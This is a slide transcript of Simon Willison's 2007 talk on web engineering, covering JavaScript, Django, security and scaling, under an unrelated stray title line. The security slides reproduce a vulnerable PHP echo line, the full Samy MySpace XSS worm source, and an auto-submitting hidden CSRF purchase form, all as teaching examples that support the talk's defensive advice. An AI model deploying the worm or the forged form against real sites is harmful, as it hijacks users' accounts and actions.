Where to Learn More About FDO _ Richard at FIDO Alliance.pdf
 

How to build the Web

  • 1. How to build the Web Simon Willison 30th November 2007
  • 2. This talk • Modern client-side engineering • Server-side engineering and web frameworks • Web application security • Building sites that scale
  • 3. What to build How to build it Product design Browsers! Information architecture Client-side engineering User experience Social software design Servers! Usability Server-side engineering Marketing ...
  • 5. The great myth of client-side development “It’s way easier than server-side development - after all, it’s just HTML”
  • 7. “Yahoo! Juku is a comprehensive, 3-6 month program to train professional front end developers. The curriculum includes advanced topics in JavaScript, DOM, HTML, CSS,YUI, performance, and accessibility. Why train raw recruits to this degree? Well, in the San Francisco Bay Area, including the Silicon Valley, it’s hard-as-heck to find good front end programmers and web designers.” http://developer.yahoo.net/blog/archives/2007/11/the_harvard_of.html
  • 9. (*O/*_/ http://ideology.com.au/polyglot/ Cu #%* )pop mark/CuG 4 def/# 2 def%%%%@@P[TX---PP_SXPY!Ex(mx2ex(quot;SX!Ex4P)Ex= CuG #%* *+Ex= CuG #%*------------------------------------------------------------------*+Ex= Polyglots CuG #%* POLYGLOT - a program in eight languages 15 February 1991 *+Ex= CuG #%* 10th Anniversary Edition 1 December 2001 *+Ex= CuG #%* Written by Kevin Bungard, Peter Lisle, and Chris Tham *+Ex= CuG #%*------------------------------------------------------------------*QuZ= CuG #%* *+Ex= CuG #%*!Mx)ExQX5ZZ5SSP5n*5X!)Ex+ExPQXH,B+ExP[-9A-9B(g?(gA'UTTER_XYZZXX!X *+ CuG #(* *( C # */); /*( C # *) program polyglot (output); (*+ C # identification division. C C # program-id. polyglot. C # C # data division. Perl C # procedure division. C # Pascal C # * ))cleartomark /Bookman-Demi findfont 36 scalefont setfont ( C #* ( C # Fortran C #* hello polyglots$ C # main. COBOL C # perform C /# * ) 2>_$$; echo quot;hello polyglotsquot;; rm _$$; exit; C #*( PostScript C # C *0 ) unless print quot;hello polyglotsnquot;; __END__ bash/sh/csh print C stop run. -*, 'hello polyglots' x86 assembler C C print. C display quot;hello polyglotsquot;. ( C */ int i; /* C */ main () { /* C */ i=printf (quot;hello polyglotsnquot;); O= &i; return *O; /* C *) (* C *) begin (* C *) writeln ('hello polyglots'); (* C *) (* ) C * ) pop 60 360 ( C * ) pop moveto (hello polyglots) show ( C * ) pop showpage (( C *) end .(* ) C)pop% program polyglot. *){*/}
  • 11. Rendering engines Opera desktop Safari Opera mobile iPhone Nintendo Wii Nokia Series 60 Nintendo DS Google Android Firefox Ice weasel Sadly still 85% Camino of the market Galleon
  • 12. IE is the problem child • Microsoft simply stopped updating it once they had won the browser wars... IE 6 came out in 2001! • Still has shaky support for CSS 2.1 • Many JavaScript APIs developed before standards even existed • Requires a disproportionate amount of development time • Status of IE 8 is uncertain
  • 13. Recommendations • Develop to the standards using Firefox • The cases where IE deviates from the standards are relatively well understood, and can usually be worked around • Avoid CSS hacks; conditional comments are your friend <!--[if IE]><link rel=quot;stylesheetquot; type=quot;text/ cssquot; href=quot;/static/ieonly.cssquot;><![endif]-->
  • 14.
  • 15.
  • 16. Accessibility • Assistive technology thrives on semantic HTML • <label> elements for forms • <h1>...<h6> headers for structure • Avoiding tables for layout • Watch a video of a screen reader user; they may well browse faster than you do • Accessibility is much more than just screen readers - colour blindness, motor disorders, learning disabilities, even just poor eyesite
  • 17. JavaScript “JavaScript was a rushed little hack for Netscape 2 that was then frozen prematurely during the browser wars, and evolved significantly only once by ECMA. So its early flaws were never fixed, and worse, no virtuous cycle of fine-grained community feedback [...] ever occurred.” -Brendan Eich
  • 18. But despite that... • JavaScript is actually a really neat little language • Functions are first-class objects • Lexical closures • Objects are hash tables • If you take the time to learn it, it will repay you handsomely
  • 19.
  • 20. Ajax
  • 22. AJAX v.s. Ajax “Asynchronous JavaScript + XML”
  • 23. AJAX v.s. Ajax “Any technique that “Asynchronous allows the client to JavaScript + XML” retrieve more data from the server without reloading the whole page”
  • 24. Unobtrusive JavaScript • JavaScript isn't always available • Security conscious organisations (and users) sometimes disable it • Some devices may not support it (mobile phones for example) • Assistive technologies (screen readers) may not play well with it • Search engine crawlers won't execute it • Unobtrusive: stuff still works without it!
  • 25. Progressive enhancement • Start with solid markup • Use CSS to make it look good • Use JavaScript to enhance the usability of the page • The content remains accessible no matter what
  • 27. labels.js • One of the earliest examples of this technique, created by Aaron Boodman (now of Greasemonkey and Google Gears fame)
  • 28.
  • 29.
  • 30. How it works <label for=quot;searchquot;>Search</label> <input type=quot;textquot; id=quot;searchquot; name=quot;qquot;> • Once the page has loaded, the JavaScript: • Finds any label elements linked to a text field • Moves their text in to the associated text field • Removes them from the DOM • Sets up the event handlers to remove the descriptive text when the field is focused • Clean, simple, reusable
  • 31. easytoggle.js • An unobtrusive technique for revealing panels when links are clicked <ul> <li><a href=quot;#panel1quot; class=quot;togglequot;>Panel 1</a></li> <li><a href=quot;#panel2quot; class=quot;togglequot;>Panel 2</a></li> <li><a href=quot;#panel3quot; class=quot;togglequot;>Panel 3</a></li> </ul> <div id=quot;panel1quot;>...</div> <div id=quot;panel2quot;>...</div> <div id=quot;panel3quot;>...</div>
  • 32.
  • 33.
  • 34. How it works • When the page has loaded... • Find all links with class=quot;togglequot; that reference an internal anchor • Collect the elements that are referenced by those anchors • Hide all but the first • Set up event handlers to reveal different panels when a link is clicked • Without JavaScript, links still jump to the right point
  • 35. Django filter lists • Large multi-select boxes aren't much fun • Painful to scroll through • Easy to lose track of what you have selected • Django's admin interface uses unobtrusive JavaScript to improve the usability here
  • 36.
  • 37.
  • 38. • Ajax is often used to avoid page refreshes • So... • Write an app that uses full page refreshes • Use unobtrusive JS to quot;hijackquot; links and form buttons and use Ajax instead • Jeremy Keith coined the term quot;Hijaxquot; to describe this
  • 39. JavaScript libraries “The bad news: JavaScript is broken. The good news: It can be fixed with more JavaScript!” - Geek folk saying
  • 40. Main contenders • Prototype • The Yahoo! User Interface Library • The Dojo Toolkit • jQuery • It’s worth evaluating these in detail, but if you only have time to learn one...
  • 41. The short answer: use jQuery
  • 42. Client-side performance • Relatively new field, pioneered by the performance team at Yahoo! • A few simple changes can make a huge difference to perceived loading times • Example tip: serve your static files (CSS, images etc) from a separate domain - that way the cookies from your regular domain won’t slow down the requests
  • 43.
  • 45. URL design (Yes, I should probably be calling them URIs)
  • 46. Bad URLs example.com/index.html example.com/article.php?sectionId=2343&contentId=638 example.com/blog/2007/December.aspx www.amazon.com/dp/0596516177? tag=davidflanagancom&camp=14573&creative=327641&linkCode=as1& creativeASIN=0596516177&adid=165MWWERY4H71AJERGNZ& • Unnecessary filenames • Expose implementation details • Overly complex
  • 47. Characteristics of good URLs • “Cool URIs don’t change” • Guessable • Hackable • Readable over the phone • Reflects the hierarchy of the site and its data
  • 48. A good URL • simonwillison.net/2007/Nov/27/thumbnail/ • Short, hackable, no implementation exposed • No matter what you’re building, including the year can be really useful in allowing you to change your opinion on your URLs later on without breaking old links
  • 49. The Open Source stack • The only option I would consider • Open source means: • Zero vendor lock-in; many open-source components are interchangeable • Better support (fix it yourself, or pay someone smart to fix it for you) • Less bugs and better quality code
  • 50. Dynamic languages http://xkcd.com/303/
  • 51. Dynamic languages • Social applications in particular are almost impossible to get right first time • Development only really starts after you’ve launched something and seen what people use it for • Speed and flexibility of development are critical • Dynamic languages let you get more done with less lines of code (which means less bugs)
  • 52. LAMP • Linux • Apache • MySQL • PHP/Perl/Python
  • 53. LAMP, evolved • Linux / FreeBSD / Solaris • Apache / Lighttpd / nginx / ... • MySQL / PostgreSQL • PHP/Perl/Python / Ruby
  • 54. Web frameworks • Ruby: Ruby on Rails • Python: Django, Pylons, TurboGears • PHP: Symfony, CakePHP, Zend Framework • Perl: Catalyst, Maypole
  • 55. Web frameworks • Ruby: Ruby on Rails • Python: Django, Pylons, TurboGears • PHP: Symfony, CakePHP, Zend Framework • Perl: Catalyst, Maypole
  • 58.
  • 59. • Two developers • Two designers • Around a dozen editorial staff
  • 60.
  • 61.
  • 62.
  • 63.
  • 64.
  • 65.
  • 66.
  • 67.
  • 68.
  • 69.
  • 70.
  • 71.
  • 72.
  • 73.
  • 74. How do you build a site like lawrence.com? • Interns - unpaid labour! • A big relational database • Newspaper people are baffled by these... • ... so you need a good interface for it • And as many development shortcuts as possible
  • 75. Characteristics • Clean URLs • Loosely coupled components • Designer-friendly templates • Less code • The “good bits” from PHP
  • 76. The Django stack • HTTP handling • Models (an ORM) • Views • Templates • Extras • Admin, RSS framework, generic views...
  • 77. The Django workflow • Build the models • Instant admin! Content people can start adding data • Writing the views • Throw the templates to the designers
  • 78.
  • 79. Open source Django • Django has been open-source since mid-2005 • The newspaper has been able to hire excellent developers from the community • The newspaper CMS is sold as Ellington; one of the features is that you can hire your own Django developers to modify it • Django has been hugely improved by contributions from outside the newspaper
  • 82.
  • 84. All frameworks provide: • A recommended way of laying out code • Separation of application and presentation logic using a template system • An ORM, to reduce the amount of code needed to talk to a database • Reusable components for common tasks
  • 86. Three key attacks • SQL injection • XSS (cross-site scripting) • CSRF (cross-site request forgery)
  • 88. • SQL injection is inexcusable • If the environment you are using doesn’t protect against this for you (through parameterised queries), use a different tool
  • 89. Cross-site scripting • The most common security hole on the web http://example.com/search?q=<script>alert(quot;helloquot;);</script> You searched for <?php echo $_GET['q']; ?> • Massive security hole!
  • 90. XSS attackers can... • Replace your logo with something obscene • Steal your user’s authentication cookies • Re-target login forms to point to a password stealing script • Perform any action that the user is allowed to perform themselves • Create self-propagating worms
  • 91. http://namb.la/popular/ http://namb.la/popular/tech.html samy is my hero
  • 92. <div id=mycode style=quot;BACKGROUND: url('java script:eval(document.all.mycode.expr)')quot; expr=quot;var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}catch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromURL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split ('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if (location.hostname=='profile.myspace.com'){document.location='http://www.myspace.com'+location.pathname+location.search}else{if(!M) {getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while (Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval ('J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if(BJ=='POST'){J.setRequestHeader('Content-Type','application/x-www-form- urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB) +BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn (BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE) {AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'} var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes','</td>');AG=AG.substring (61,AG.length);if(AG.indexOf('samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel'] ='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm? fuseaction=profile.previewInterests&Mytoken='+AR,postHero,'POST',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return} var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS ['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm? fuseaction=profile.processInterests&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/ index.cfm?fuseaction=user.viewProfile&friendID='+AN+'&Mytoken='+L;J=getXMLObj();httpSend (BH,getHome,'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm? fuseaction=invite.addfriend_verify&friendID=11851658&Mytoken='+L,processxForm,'GET')}function processxForm(){if (xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL (AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm? fuseaction=invite.addFriendsProcess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}function httpSend2(BH,BI,BJ,BK){if(!xmlhttp2) {return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content- Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}quot;></ DIV>
  • 93. HTML is dangerous • It’s best not to allow un-trusted users to submit HTML at all • If you let them submit HTML, you’ll need an industrial grade HTML parser (which emulates browsers, not just the HTML spec) and a very restrictive whitelist • CSS can include JavaScript, and even regular CSS positioning can be used for phishing
  • 94. CSRF • Much less widely understood than XSS... • ... but almost certainly more common • Cross-site request forgery attacks allow attackers to force your users to take actions on your site that they didn’t mean to take • <img src=quot;http://example.com/admin/delete.php?id=5quot;> • Not just GET; hidden forms allow POST as well
  • 95. <iframe style=quot;width: 0px; height: 0px; visibility: hiddenquot; name=quot;hiddenquot;></iframe> <form name=quot;csrfquot; action=quot;http://amazon.com/gp/ product/handle-buy-boxquot; method=quot;postquot; target=quot;hiddenquot;> <input type=quot;hiddenquot; name=quot;ASINquot; value=quot;059600656Xquot; /> <input type=quot;hiddenquot; name=quot;offerListingIDquot; value=quot;XYPvvbir%2FyHMyphE%2Fy0hKK%2BNt%2FB7% 2FlRTFpIRPQG28BSrQ98hAsPyhlIn75S3jksXb3bdE% 2FfgEoOZN0Wyy5qYrwEFzXBuOgqfquot; /> </form> <script>document.forms.csrf.submit();</script> http://shiflett.org/blog/2007/mar/my-amazon-anniversary
  • 96.
  • 97. Defence against CSRF • You need to know if the form that is being submitted is one that you served up from your own site (as opposed to an evil form created by an attacker) • Include a hidden form field with a token generated by your site and associated with the logged in user in a non-predictable way
  • 99. Scalability is not performance
  • 100. Scalability is not performance Scalable systems increase their performance as new hardware is added, proportional to the hardware’s capacity
  • 101. Vertical v.s. horizontal • Vertical scaling: buy a bigger machine • More RAM • More CPU(s) • “Big iron” costing $100,000+ • Horizontal scaling: buy more machines • Almost always better than vertical scaling • But... software must be designed to scale out
  • 102. “Premature optimisation is the root of all evil” - Tony Hoare and Donald Knuth
  • 104. “Shared nothing” • Rasmus Lerdorf, the creator of PHP, describes this as a key principle of scaling • Application servers (web servers running PHP) have no shared state - everything stateful is pushed out to the database layer • This lets you trivially horizontally scale your application servers behind a load balancer • Now you just have to scale the data layer...
  • 105. Four steps to building a scalable data layer • Add caching • De-normalise where necessary • Add database replication • Add sharding
  • 106. Caching • You could cache to disk or shared memory... • ... but you’re better off using memcached • Distributed key/value in-memory caching system, first developed for LiveJournal • Facebook,YouTube, Wikipedia, Flickr... obj = memcache.get(obj_id) if not obj: obj = construct_obj_from_database(obj_id) memcache.put(obj_id, obj) return obj
  • 107. “Normalised data is for sissies” Cal Henderson, Flickr • You can get a major speed-up by duplicating some data (e.g. counts) in your database • Your application logic will need to keep everything in sync
  • 108. Replication • Master-slave replication lets you set up copies of the database to accelerate reads Writes all go to master Master Slave Slave Slave Reads spread across all slaves
  • 109. Replication • Master-master replication provides redundant masters, but doesn’t really improve write performance (both still have to make the same number of writes) Writes all go to masters Master Master Slave Slave Slave Reads spread across all slaves
  • 110. Sharding • Sometimes known as federation • Users 1-1000 are on database A, 1000-2000 are on database B... • Often requires a large scale re-write of the system • Much harder to do in social applications where relationships span multiple databases • WordPress MU is an interesting case-study
  • 111.
  • 112. Scalable business models • Scaling gets a lot easier if you build it in to your business model • 37signals products (Basecamp, Highrise) shard naturally based on individual customer accounts - and more customers means more money for servers • Second Life shards by land area, and land has to be bought by users - they’re essentially a 3D web hosting company
  • 113. Build it on Amazon • S3 - Simple Storage Service • Cheap, robust key-value storage of both small and large files • EC2 - Elastic Compute Cloud • On-demand instant virtual servers, billed by the hour • SQS - Simple Queue Service